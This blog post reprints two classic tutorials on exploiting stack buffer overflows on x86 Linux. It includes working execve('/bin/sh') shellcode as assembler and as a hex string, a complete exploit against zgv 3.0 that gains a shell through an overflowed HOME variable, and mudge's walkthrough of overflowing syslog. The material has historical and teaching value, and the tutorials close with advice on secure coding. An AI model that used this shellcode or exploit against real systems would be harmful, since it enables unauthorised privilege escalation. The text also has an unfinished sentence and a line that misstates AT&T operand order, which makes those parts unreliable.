Wednesday, October 25, 2006

buffer overflow

Writing buffer overflow exploits - a tutorial for beginners
by Mixter
http://mixter.void.ru or http://mixter.warrior2k.com

Buffer overflows in buffers that depend on user input have become one of the biggest security hazards on the internet and to modern computing in general. This is because such an error is easily made at the programming level, and while it is invisible to the user who does not understand or cannot acquire the source code, many of those errors are easy to exploit. This paper attempts to teach the novice to average C programmer how an overflow condition can be proven to be exploitable. - Mixter
_______________________________________________________________________________
1. Memory

Note: Memory for a process is organized the way I describe it here on most computers, but the details depend on the processor architecture. This example is for x86 and also roughly applies to sparc.

The principle of exploiting a buffer overflow is to overwrite parts of memory which aren't supposed to be overwritten by arbitrary input, and to make the process execute the code we placed there. To see how and where an overflow takes place, let's take a look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which the process can then access without having to know where the memory is physically located in RAM. The process's memory consists of three sections:

- code segment, data in this segment are assembler instructions that the processor executes. The code execution is non-linear, it can skip code, jump, and call functions on certain conditions. Therefore, we have a pointer called EIP, or instruction pointer. The address where EIP points to always contains the code that will be executed next.

- data segment, space for variables and dynamic buffers

- stack segment, which is used to pass data (arguments) to functions and as a space for variables of functions. The bottom (start) of the stack usually resides at the very end of the virtual memory of a page, and grows down. The assembler command PUSHL will add to the top of the stack, and POPL will remove one item from the top of the stack and put it in a register. For accessing the stack memory directly, there is the stack pointer ESP that points at the top (lowest memory address) of the stack.
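
The "grows down" claim in the stack segment item can be checked on your own machine. This is a minimal sketch, not part of the original tutorial: the names record_local_address, call_nested and stack_grows_down are made up for illustration, and comparing the addresses of two unrelated locals is only meaningful on conventional flat-memory platforms such as x86.

```c
#include <stdint.h>

/* Stores the address of one of this function's own locals in *out. */
static void record_local_address(uintptr_t *out)
{
    volatile char marker = 0;
    *out = (uintptr_t)&marker;
}

/* Called through a volatile pointer so the compiler cannot inline it,
   which keeps the two locals in two separate stack frames. */
static void (*volatile call_nested)(uintptr_t *) = record_local_address;

/* Returns 1 if the nested call's frame lies at a lower address than the
   caller's frame (the stack grows down), 0 otherwise. */
int stack_grows_down(void)
{
    volatile char marker = 0;
    uintptr_t outer = (uintptr_t)&marker;
    uintptr_t inner = 0;

    call_nested(&inner);
    return inner < outer;
}
```

Call stack_grows_down() from any program and print the result; on the x86 systems this paper deals with you should expect 1.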

_______________________________________________________________________________
2. Functions

A function is a piece of code in the code segment, that is called, performs a task, and then returns to the previous thread of execution. Optionally, arguments can be passed to a function. In assembler, it usually looks like this (very simple example, just to get the idea):

memory address code
0x8054321 pushl $0x0
0x8054322 call $0x80543a0
0x8054327 ret
0x8054328 leave
...
0x80543a0 popl %eax
0x80543a1 addl $0x1337,%eax
0x80543a4 ret

What happens here? The main function calls function(0);

The variable is 0, main pushes it onto the stack, and calls the function. The function gets the variable from the stack, shown here as a simple popl (real compiler output reads arguments relative to ESP or EBP, because the return address lies on top of them). After finishing, it returns to 0x8054327. Commonly, the called function first pushes register EBP onto the stack and restores it before returning. This is the frame pointer concept, which allows the function to use its own offsets for addressing. It is mostly uninteresting when dealing with exploits, because the function will not return to the original execution thread anyway. :-)

We just have to know what the stack looks like. At the top, we have the internal buffers and variables of the function. After this, there is the saved EBP register (32 bit, which is 4 bytes), and then the return address, which is again 4 bytes. Further down, there are the arguments passed to the function, which are uninteresting to us.

In this case, our return address is 0x8054327. It is automatically stored on the stack when the function is called. This return address can be overwritten, and changed to point to any point in memory, if there is an overflow somewhere in the code.
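
The stack layout described above can be written down as a C struct to make the distances concrete. This is only a model: struct frame_model and the helper names are hypothetical, the 32 byte size of the local area is an assumption picked for illustration, and a real compiler is free to lay out a frame differently.

```c
#include <stddef.h>
#include <stdint.h>

/* Model of a 32-bit x86 stack frame, lowest address first. */
struct frame_model {
    char     locals[32];    /* internal buffers and variables (assumed size) */
    uint32_t saved_ebp;     /* saved frame pointer, 4 bytes */
    uint32_t return_addr;   /* where 'ret' will continue, 4 bytes */
    uint32_t first_arg;     /* arguments passed by the caller */
};

/* Bytes that lie between the start of the locals and the saved EBP. */
size_t bytes_before_saved_ebp(void)
{
    return offsetof(struct frame_model, saved_ebp);
}

/* Bytes that lie between the start of the locals and the return address. */
size_t bytes_before_return_addr(void)
{
    return offsetof(struct frame_model, return_addr);
}
```

In this model a write that starts at locals and runs 36 bytes or more reaches the return address, which is exactly the situation an overflow creates.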
_______________________________________________________________________________
3. Example of an exploitable program

Let's assume that we exploit a function like this:

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }

Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 : pushl %ebp
0x80484c9 : movl %esp,%ebp
0x80484cb : call 0x80484a0
0x80484d0 : leave
0x80484d1 : ret

(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack right before the ret address */
0x80484a0 : pushl %ebp
0x80484a1 : movl %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the
memory is allocated 4byte-wise (because the processor uses 32bit words)
this is the equivalent to: char small[30]; */
0x80484a3 : subl $0x20,%esp
/* load a pointer to small[30] (the space on the stack, which is located
at virtual address 0xffffffe0(%ebp)) on the stack, and call
the gets function: gets(small); */
0x80484a6 : leal 0xffffffe0(%ebp),%eax
0x80484a9 : pushl %eax
0x80484aa : call 0x80483ec
0x80484af : addl $0x4,%esp
/* load the address of small and the address of "%s\n" string on stack
and call the print function: printf("%s\n", small); */
0x80484b2 : leal 0xffffffe0(%ebp),%eax
0x80484b5 : pushl %eax
0x80484b6 : pushl $0x804852c
0x80484bb : call 0x80483dc
0x80484c0 : addl $0x8,%esp
/* get the return address, 0x80484d0, from stack and return to that address.
you don't see that explicitly here because it is done by the CPU as 'ret' */
0x80484c3 : leave
0x80484c4 : ret
End of assembler dump.

3a. Overflowing the program
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# ./blah
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb blah core
(gdb) info registers
eax: 0x24 36
ecx: 0x804852f 134513967
edx: 0x1 1
ebx: 0x11a3c8 1156040
esp: 0xbffffdb8 -1073742408
ebp: 0x787878 7895160

EBP is 0x787878, which means that we have written more data onto the stack than the input buffer could hold. 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes maximum size. Our 35 characters plus the terminating zero byte ran past it and overwrote the saved EBP with 'xxx\0', which reads as 0x00787878 on a little-endian machine. A slightly longer input overwrites the return address in the same way. With its frame pointer corrupted, the process ran into a segmentation fault when it tried to continue.
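
For contrast, here is how the same function behaves once the read is bounded. This is a minimal sketch: read_line_bounded and not_so_lame are names invented here, and fgets() is used in place of gets() so that input beyond the buffer is left unread instead of being written over the saved EBP.

```c
#include <stdio.h>
#include <string.h>

/* Reads at most size-1 characters of one line into buf.
   Returns the number of characters stored, or -1 on EOF or error. */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    buf[strcspn(buf, "\n")] = '\0';   /* drop the newline, if one fit */
    return (int)strlen(buf);
}

/* Same job as lame(), but a long line can no longer leave the buffer. */
void not_so_lame(FILE *in)
{
    char small[30];

    if (read_line_bounded(in, small, sizeof small) >= 0)
        printf("%s\n", small);
}
```

Feeding the 35 character line from above to not_so_lame(stdin) prints the first 29 characters and returns normally.
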
3b. Changing the return address

Let's try to exploit the program so that it returns into the call to lame() again instead of returning normally. We have to change the return address 0x80484d0 to 0x80484cb, that is all. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program that fills a character buffer with repeated copies of the 4 byte return address:

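#include <stdio.h>
int main(void)
{
int i=0; char buf[48];
/* assumes a 4 byte long, as on the 32-bit x86 Linux used in this tutorial */
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
buf[44] = '\0'; /* puts() needs a terminated string */
puts(buf);
return 0;
}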
# ret
ЛЛЛЛЛЛЛЛЛЛЛ,

# (ret;cat)|./blah
test <- user input
ЛЛЛЛЛЛЛЛЛЛЛ,test
test <- user input
test

Here we are, the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the program's flow of execution.
_______________________________________________________________________________
4. Shellcode

To keep it simple, shellcode is simply a sequence of assembler commands which we write onto the stack, and then change the return address so that execution returns to the stack. Using this method, we can insert code into a vulnerable process and then execute it right on the stack. So, let's generate insertable assembler code to run a shell. A common system call is execve(), which loads and runs any binary, replacing the current process. The manpage gives us the usage:

int execve (const char *filename, char *const argv [], char *const envp[]);

Let's get the details of the system call from glibc2:

# gdb /lib/libc.so.6
(gdb) disas execve
Dump of assembler code for function execve:
0x5da00 : pushl %ebx

/* this is the actual syscall. before a program would call execve, it would
push the arguments in reverse order on the stack: **envp, **argv, *filename */
/* put address of **envp into edx register */
0x5da01 : movl 0x10(%esp,1),%edx
/* put address of **argv into ecx register */
0x5da05 : movl 0xc(%esp,1),%ecx
/* put address of *filename into ebx register */
0x5da09 : movl 0x8(%esp,1),%ebx
/* put 0xb in eax register; 0xb == execve in the internal system call table */
0x5da0d : movl $0xb,%eax
/* give control to kernel, to execute execve instruction */
0x5da12 : int $0x80

0x5da14 : popl %ebx
0x5da15 : cmpl $0xfffff001,%eax
0x5da1a : jae 0x5da1d <__syscall_error>
0x5da1c : ret
End of assembler dump.

4a. making the code portable

We have to apply a trick to be able to make shellcode without having to reference the arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time.

Once we can estimate the size of the shellcode, we can use the instructions jmp and call to go a specified number of bytes back or forth in the execution thread. Why use a call? A CALL automatically stores the return address on the stack, and that return address is the address of the bytes immediately following the CALL instruction. By placing a variable right behind the call, we indirectly push its address onto the stack without having to know it.

0 jmp (skip Z bytes forward)
2 popl %esi
... put function(s) here ...
Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL)
Z+5 .string (first variable)

(Note: If you're going to write code more complex than for spawning a simple shell, you can put more than one .string behind the code. You know the size of those strings and can therefore calculate their relative locations once you know where the first string is located.)
4b. the shellcode

global code_start /* we'll need this later, dont mind it */
global code_end
.data
code_start:
jmp 0x17
popl %esi
movl %esi,0x8(%esi) /* put address of **argv behind shellcode,
0x8 bytes behind it so a /bin/sh has place */
xorl %eax,%eax /* put 0 in %eax */
movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */
movl %eax,0xc(%esi) /* another 0 to get the size of a long word */
my_execve:
movb $0xb,%al /* execve( */
movl %esi,%ebx /* "/bin/sh", */
leal 0x8(%esi),%ecx /* & of "/bin/sh", */
xorl %edx,%edx /* NULL */
int $0x80 /* ); */
call -0x1c
.string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */
code_end:

(The relative offsets 0x17 and -0x1c can be found by putting in 0x0, compiling, disassembling and then looking at the shellcode's size.)

This is already working shellcode, though very minimal. You should at least disassemble the exit() syscall and attach it (before the 'call'). The real art of making shellcode also consists of avoiding any binary zeroes in the code (a zero byte very often marks the end of input or of a buffer) and of modifying it so that, for example, the binary code does not contain control or lower case characters, which some vulnerable programs filter out. Most of this is done by self-modifying code, like we had in the movb %eax,0x7(%esi) instruction. We replaced the X with \0, but without having a \0 in the shellcode initially...
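
Why binary zeroes matter comes down to how C string functions work: they stop at the first zero byte. A minimal sketch, with the hypothetical helper name bytes_seen_by_string_copy, that reports how much of a block of bytes a strcpy()-style copy would actually take:

```c
#include <stddef.h>
#include <string.h>

/* Returns how many of the n bytes in data come before the first zero byte,
   which is all that a strcpy()-style copy would transfer. If there is no
   zero byte, all n bytes count. */
size_t bytes_seen_by_string_copy(const unsigned char *data, size_t n)
{
    const unsigned char *zero = memchr(data, 0, n);

    return zero ? (size_t)(zero - data) : n;
}
```

For the four bytes 0x41 0x42 0x00 0x43 the function returns 2: everything after the zero byte never arrives in the destination buffer.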

Let's test this code... save the above code as code.S (remove comments) and the following file as code.c:

extern void code_start();
extern void code_end();
#include <stdio.h>
main() { ((void (*)(void)) code_start)(); }

# cc -o code code.S code.c
# ./code
bash#

You can now convert the shellcode to a hex char buffer. The best way to do this is to print it out:

#include <stdio.h>
extern void code_start(); extern void code_end();
main() { fprintf(stderr,"%s",code_start); }

and parse it through aconv -h or bin2c.pl, those tools can be found at: http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
_______________________________________________________________________________
5. Writing an exploit

Let us take a look at how to change the return address to point to shellcode put on the stack, and write a sample exploit. We will take zgv, because that is one of the easiest things to exploit out there :)

# export HOME=`perl -e 'printf "a" x 2000'`
# zgv
Segmentation fault (core dumped)
# gdb /usr/bin/zgv core
#0 0x61616161 in ?? ()
(gdb) info register esp
esp: 0xbffff574 -1073744524

Well, this is the top of the stack at crash time. It is safe to presume that we can use this as return address to our shellcode.

We will now add some NOP (no operation) instructions before our shellcode, so we don't have to be 100% correct in predicting the exact start of our shellcode in memory (or resort to brute forcing it). The function will return onto the stack somewhere before our shellcode, work its way through the NOPs to the initial JMP command, jump to the CALL, jump back to the popl, and run our code on the stack.

Remember, the stack looks like this: at the lowest memory address, the top of the stack where ESP points to, the initial variables are stored, namely the buffer in zgv that stores the HOME environment variable. After that, we have the saved EBP(4bytes) and the return address of the previous function. We must write 8 bytes or more behind the buffer to overwrite the return address with our new address on the stack.

The buffer in zgv is 1024 bytes big. You can find that out by glancing at the code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable function. We will now put all those parts together in the exploit:
5a. Sample zgv exploit

/* zgv v3.0 exploit by Mixter
buffer overflow tutorial - http://1337.tsx.org

sample exploit, works for example with precompiled
redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* This is the minimal shellcode from the tutorial */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP 0x90
#define LEN 1032
#define RET 0xbffff574

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* this fills the whole buffer with the return address, see 3b) */
for (i=0;i<LEN;i+=4)
*(long *)&buffer[i] = retaddr;

/* this fills the initial buffer with NOP's, 100 chars less than the
buffer size, so the shellcode and return address fits in comfortably */
for (i=0;i<(LEN-strlen(shellcode)-100);i++)
*(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run zgv */

setenv("HOME", buffer, 1);
execlp("zgv","zgv",NULL);
return 0;
}

/* EOF */

We now have a string looking like this:

[ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]

While zgv's stack looks like this:

v-- 0xbffff574 is here
[ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]

The execution thread of zgv is now as follows:

main ... -> function() -> strcpy(smallbuffer,getenv("HOME"));

At this point, zgv fails to do bounds checking, writes beyond smallbuffer, and the return address to main is overwritten with our new address, which points onto the stack. function() does leave/ret and the EIP points onto the stack:

0xbffff574 nop
0xbffff575 nop
0xbffff576 nop
0xbffff577 jmp $0x24 1
0xbffff579 popl %esi 3 <--\ |
[... shellcode starts here ...] | |
0xbffff59b call -$0x1c 2 <--/
0xbffff59e .string "/bin/shX"

Let's test the exploit...

# cc -o zgx zgx.c
# ./zgx
using address 0xbffff574
bash#

5b. further tips on writing exploits

There are a lot of programs which are tough to exploit, but nonetheless vulnerable. However, there are a lot of tricks you can use to get past filtering and the like. There are also other overflow techniques which do not necessarily involve changing the return address at all, or not only the return address. There are so-called pointer overflows, where a pointer that a function allocates can be overwritten by an overflow, altering the program's execution flow (an example is the RoTShB bind 4.9 exploit), and exploits where the return address points to the shell's environment pointer, where the shellcode is located instead of being on the stack (this defeats very small buffers and non-executable stack patches, and can fool some security programs, though it can only be performed locally).

Another important subject for the skilled shellcode author is radically self-modifying code, which initially only consists of printable, non-white upper case characters, and then modifies itself to put functional shellcode on the stack which it executes, etc.

You should never, ever have any binary zeroes in your shellcode, because it will most likely not work if it contains any. But discussing how to substitute certain assembler commands with others would go beyond the scope of this paper. I also suggest reading the other great overflow howto's out there, written by aleph1, Taeho Oh and mudge.
5c. Important Note

You will NOT be able to use this tutorial on Windows or Macintosh. Do NOT ask me for cc.exe and gdb.exe either!
_______________________________________________________________________________
6. Conclusions

We have learned that once an overflow is present which depends on user input, it can be exploited about 90% of the time, even though exploiting some situations is difficult and takes some skill. Why is it important to write exploits? Because ignorance is omnipresent in the software industry. There have already been reports of vulnerabilities due to buffer overflows in software where the software was not updated, or the majority of users didn't update, because the vulnerability was hard to exploit and nobody believed it created a security risk. Then an exploit actually comes out and proves that the program can be exploited in practice, and there is usually a big (necessary) hurry to update it.

As for the programmer (you), it is a hard task to write secure programs, but it should be taken very seriously. This is an especially large concern when writing servers, any type of security program, or programs that are suid root or designed to be run by root, any special accounts, or the system itself. The main principles I suggest are: apply bounds checking (strn* and sn* functions instead of sprintf etc.), prefer allocating buffers of a dynamic, input-dependent size, be careful with for/while/etc. loops that gather data and stuff it into a buffer, and generally handle user input with very much care.
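
The bounds checking advice can look like this in practice. This is a minimal sketch with a made-up helper name, copy_checked; it uses snprintf() from the sn* family so that the destination can never be overrun, and it reports truncation so the caller can reject the input instead of silently working with half of it.

```c
#include <stdio.h>
#include <string.h>

/* Copies src into dst, which has room for dst_size bytes.
   Returns 0 if src fit completely, -1 if it did not (or dst_size is 0).
   Whenever dst_size > 0, dst ends up zero-terminated. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    int needed;

    if (dst_size == 0)
        return -1;
    needed = snprintf(dst, dst_size, "%s", src);
    if (needed < 0 || (size_t)needed >= dst_size)
        return -1;   /* truncated: the caller should reject this input */
    return 0;
}
```

A program that copied getenv("HOME") through a helper like this, and bailed out on -1, would not have the problem that zgv shows in section 5.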

The security industry has also made a notable effort to prevent overflow problems with techniques like non-executable stacks, suid wrappers, guard programs that check return addresses, bounds checking compilers, and so on. You should make use of those techniques where possible, but do not fully rely on them. Do not assume you are safe at all if you run a vanilla two-year-old UNIX distribution without updates, but with overflow protection or (even more stupid) firewalling/IDS. These cannot assure security if you continue to use insecure programs, because _all_ security programs are _software_ and can contain vulnerabilities themselves, or at least not be perfect. If you apply frequent updates _and_ security measures, you still cannot expect to be secure, _but_ you can hope.
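
The idea behind guards that check return addresses can be shown in a few lines. This is a toy model under stated assumptions, not how any particular protection product works: struct guarded_buffer, GUARD_VALUE and the function names are invented for this sketch, and the "overflow" is kept inside the struct so that the demonstration itself stays well defined.

```c
#include <stdint.h>
#include <string.h>

#define GUARD_VALUE 0xC0FFEE42u   /* arbitrary marker chosen for this sketch */

struct guarded_buffer {
    char     data[16];
    uint32_t guard;    /* sits directly behind data, like a guard word
                          placed between a buffer and the return address */
};

void guarded_init(struct guarded_buffer *g)
{
    memset(g->data, 0, sizeof g->data);
    g->guard = GUARD_VALUE;
}

/* Deliberately careless write that trusts n, standing in for an unchecked
   copy. It is clamped to the struct size only to keep the demo defined. */
void sloppy_write(struct guarded_buffer *g, const void *src, size_t n)
{
    if (n > sizeof *g)
        n = sizeof *g;
    memcpy(g, src, n);
}

/* Returns 1 while the guard word still holds its marker, 0 once a write
   has run past data and damaged it. */
int guard_intact(const struct guarded_buffer *g)
{
    return g->guard == GUARD_VALUE;
}
```

Writing 16 bytes leaves the guard alone; writing 20 bytes of 'A' turns it into 0x41414141, and a check of guard_intact() before returning would catch the overflow before the damaged return address is used.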

How to write Buffer Overflows

This is really rough, and some of it is not needed. I wrote this as a reminder note to myself as I really didn't want to look at any more AT&T assembly again for a while and was afraid I would forget what I had done. If you are an old assembly guru then you might scoff at some of this... oh well, it works and that's a hack in itself.

-by mudge@l0pht.com 10/20/95

test out the program (duh).

--------syslog_test_1.c------------

#include <syslog.h>

char buffer[4028];

void main() {

int i;

for (i=0; i<4027; i++) /* stay inside buffer[] and leave its last byte zero */
buffer[i]='A';

syslog(LOG_ERR, buffer);
}

--------end syslog_test_1.c----------

Compile the program and run it. Make sure you include the symbol table for the debugger or not... depending upon how macho you feel today.

bash$ gcc -g buf.c -o buf
bash$ buf
Segmentation fault (core dumped)


The 'Segmentation fault (core dumped)' is what we wanted to see. This tells us there is definitely an attempt to access some memory address that we shouldn't. If you do much in 'C' with pointers on a unix machine you have probably seen this (or Bus error) when pointing or dereferencing incorrectly.

Fire up gdb on the program (with or without the core file). Assuming you remove the core file (this way you can learn a bit about gdb), the steps would be as follows:

bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 11, Segmentation fault
0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141)


Ok, this is good. The 41's you see are the hex equivalent of the ascii character 'A'. We are definitely going places where we shouldn't be.
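
If you want to know in advance what a given fill character will look like in the debugger, the arithmetic is simple. A minimal sketch, with the hypothetical name fill_pattern_word and assuming an ASCII system:

```c
#include <stdint.h>

/* Returns the 32-bit value a debugger shows when four copies of the fill
   byte c end up in a register or in a 4 byte stack slot. */
uint32_t fill_pattern_word(unsigned char c)
{
    return (uint32_t)c * 0x01010101u;
}
```

fill_pattern_word('A') gives 0x41414141, the value seen in the vsyslog arguments above.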

(gdb) info all-registers
eax 0xefbfd641 -272640447
ecx 0x00000000 0
edx 0xefbfd67c -272640388
ebx 0xefbfe000 -272637952
esp 0xefbfd238 0xefbfd238
ebp 0xefbfde68 0xefbfde68
esi 0xefbfd684 -272640380
edi 0x0000cce8 52456
eip 0x00001273 0x1273
ps 0x00010212 66066
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39


The gdb command 'info all-registers' shows the values in the current hardware registers. The one we are really interested in is 'eip'. On some platforms this will be called 'ip' or 'pc'. It is the Instruction Pointer [also called Program Counter]. It points to the memory location of the next instruction the processor will execute. By overwriting this you can point to the beginning of your own code and the processor will merrily start executing it assuming you have it written as native opcodes and operands.

In the above we haven't gotten exactly where we need to be yet. If you want to see where it crashed out do the following:

(gdb) disassemble 0x1273
[stuff deleted]
0x1267 : incl 0xfffff3dc(%ebp)
0x126d : testb %al,%al
0x126f : jne 0x125c
0x1271 : jmp 0x1276
0x1273 : movb %al,(%ebx)
0x1275 : incl %ebx
0x1276 : incl %edi
0x1277 : movb (%edi),%al
0x1279 : testb %al,%al


If you are familiar with microsoft assembler this will be a bit backwards to you. For example: in microsoft you would 'mov ax,cx' to move cx to ax. In AT&T syntax the operands are reversed, so 'mov ax,cx' moves ax to cx. So put on those warp refraction eye-goggles and on we go.

Note also that Intel assembler

Let's go back and tweak the original source code some, eh?

-------------syslog_test_2.c-------------

#include <syslog.h>

char buffer[4028];

void main() {

int i;

for (i=0; i<2024; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}

-----------end syslog_test_2.c-------------

We're just shortening the length of 'A''s.

bash$ gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 5, Trace/BPT trap
0x1001 in ?? (Error accessing memory address 0x41414149: Cannot
allocate memory.


This is the magic response we've been looking for.

(gdb) info all-registers
eax 0xffffffff -1
ecx 0x00000000 0
edx 0x00000008 8
ebx 0xefbfdeb4 -272638284
esp 0xefbfde70 0xefbfde70
ebp 0x41414141 0x41414141 <- here it is!!!
esi 0xefbfdec0 -272638272
edi 0xefbfdeb8 -272638280
eip 0x00001001 0x1001
ps 0x00000246 582
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39



Now we move it along until we figure out where eip lives in the overflow (which is right after ebp on this architecture). With that known fact we only have to add 4 more bytes to our buffer of 'A''s and we will overwrite eip completely.

---------syslog_test_3.c----------------

#include <syslog.h>

char buffer[4028];

void main() {

int i;

for (i=0; i<2028; i++)
buffer[i]='A';

syslog(LOG_ERR, buffer);
}
-------end syslog_test_3.c------------

bash$ !gc
gcc -g buf.c -o buf
bash$ gdb buf
(gdb) run
Starting program: /usr2/home/syslog/buf

Program received signal 11, Segmentation fault
0x41414141 in errno (Error accessing memory address
0x41414149: Cannot allocate memory.


(gdb) info all-registers
eax 0xffffffff -1
ecx 0x00000000 0
edx 0x00000008 8
ebx 0xefbfdeb4 -272638284
esp 0xefbfde70 0xefbfde70
ebp 0x41414141 0x41414141
esi 0xefbfdec0 -272638272
edi 0xefbfdeb8 -272638280
eip 0x41414141 0x41414141
ps 0x00010246 66118
cs 0x0000001f 31
ss 0x00000027 39
ds 0x00000027 39
es 0x00000027 39
fs 0x00000027 39
gs 0x00000027 39


BINGO!!!

Here's where it starts to get interesting. Now that we know eip starts at buffer[2024] and goes through buffer[2027] we can load it up with whatever we need. The question is... what do we need?

We find this by looking at the contents of buffer[].

(gdb) disassemble buffer
[stuff deleted]
0xc738 : incl %ecx
0xc739 : incl %ecx
0xc73a : incl %ecx
0xc73b : incl %ecx
0xc73c : addb %al,(%eax)
0xc73e : addb %al,(%eax)
0xc740 : addb %al,(%eax)
[stuff deleted]


On the Intel x86 architecture [a pentium here but that doesn't matter] incl %ecx is opcode 0100 0001 or 41 hex, which is why our run of 'A''s disassembles as incl %ecx. addb %al,(%eax) is what the zero bytes (0000 0000 or 0x0 hex) disassemble to. We will load up buffer[2024] to buffer[2027] with the address of 0xc73c where we will start our code. You have two options here, one is to load the buffer up with the opcodes and operands and point the eip back into the buffer; the other option is what we are going to be doing which is to put the opcodes and operands after the eip and point to them.

The advantage to putting the code inside the buffer is that other than the ebp and eip registers you don't clobber anything else. The disadvantage is that you will need to do trickier coding (and actually write the assembly yourself) so that there are no bytes that contain 0x0 which will look like a null in the string. This will require you to know enough about the native chip architecture and opcodes to do this [easy enough for some people on Intel x86's but what happens when you run into an Alpha? -- lucky for us there is a gdb for Alpha I think ;-)].

The advantage to putting the code after the eip is that you don't have to worry about bytes containing 0x0 in them. This way you can write whatever program you want to execute in 'C' and have gdb generate most of the machine code for you. The disadvantage is that you are overwriting the great unknown. In most cases the section you start to overwrite here contains your environment variables and other whatnots.... upon successfully running your created code you might be dropped back into a big void. Deal with it.

The safest instruction is NOP which is a benign no-operation. This is what you will probably be loading the buffer up with as filler.

Ahhh but what if you don't know what the opcodes are for the particular architecture you are on. No problem. gcc has a wonderful construct called __asm__("..."); I rely upon this heavily for doing buffer overflows on architectures that I don't have assembler books for.

------nop.c--------
void main(){

__asm__("nop\n");

}
----end nop.c------

bash$ gcc -g nop.c -o nop
bash$ gdb nop
(gdb) disassemble main
Dump of assembler code for function main:
to 0x1088:
0x1080 : pushl %ebp
0x1081 : movl %esp,%ebp
0x1083 : nop
0x1084 : leave
0x1085 : ret
0x1086 : addb %al,(%eax)
End of assembler dump.
(gdb) x/bx 0x1083
0x1083 : 0x90


Since nop is at 0x1083 and the next instruction is at 0x1084 we know that nop only takes up one byte. Examining that byte shows us that it is 0x90 (hex).

Our program now looks like this:

------ syslog_test_4.c---------

#include <syslog.h>

char buffer[4028];

void main() {

int i;

for (i=0; i<2024; i++)
buffer[i]=0x90;

i=2024;

buffer[i++]=0x3c;
buffer[i++]=0xc7;
buffer[i++]=0x00;
buffer[i++]=0x00;


syslog(LOG_ERR, buffer);
}
------end syslog_test_4.c-------


Notice you need to load the eip backwards ie 0000c73c is loaded into the buffer as 3c c7 00 00.
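
The "backwards" order is just little-endian byte order: x86 keeps the least significant byte of a value at the lowest address. A minimal sketch of the same four assignments done by arithmetic instead of by hand, with the made-up helper name store_le32:

```c
#include <stdint.h>

/* Writes value into out[0..3] with the least significant byte first,
   which is how x86 lays out a 32-bit value in memory. */
void store_le32(unsigned char out[4], uint32_t value)
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

Calling store_le32 with 0x0000c73c produces the bytes 3c c7 00 00, the same sequence that syslog_test_4.c writes one byte at a time.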

Now the question we have is what is the code we insert from here on?

Suppose we want to run /bin/sh? Gee, I don't have a friggin clue as to why someone would want to do something like this, but I hear there are a lot of nasty people out there. Oh well. Here's the proggie we want to execute in C code:

------execute.c--------
#include <unistd.h>
main()
{
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh",name,NULL);
}
----end execute.c-------

bash$ gcc -g execute.c -o execute
bash$ execute
$


Ok, the program works. Then again, if you couldn't whip up that little prog you should probably throw in the towel here. Maybe become a webmaster or something that requires little to no programming (or brainwave activity period). Here's the gdb scoop:

bash$ gdb execute
(gdb) disassemble main
Dump of assembler code for function main:
to 0x10b8:
0x1088 : pushl %ebp
0x1089 : movl %esp,%ebp
0x108b : subl $0x8,%esp
0x108e : movl $0x1080,0xfffffff8(%ebp)
0x1095 : movl $0x0,0xfffffffc(%ebp)
0x109c : pushl $0x0
0x109e : leal 0xfffffff8(%ebp),%eax
0x10a1 : pushl %eax
0x10a2 : pushl $0x1083
0x10a7 : call 0x10b8
0x10ac : leave
0x10ad : ret
0x10ae : addb %al,(%eax)
0x10b0 : jmp 0x1140
0x10b5 : addb %al,(%eax)
0x10b7 : addb %cl,0x3b05(%ebp)
End of assembler dump.

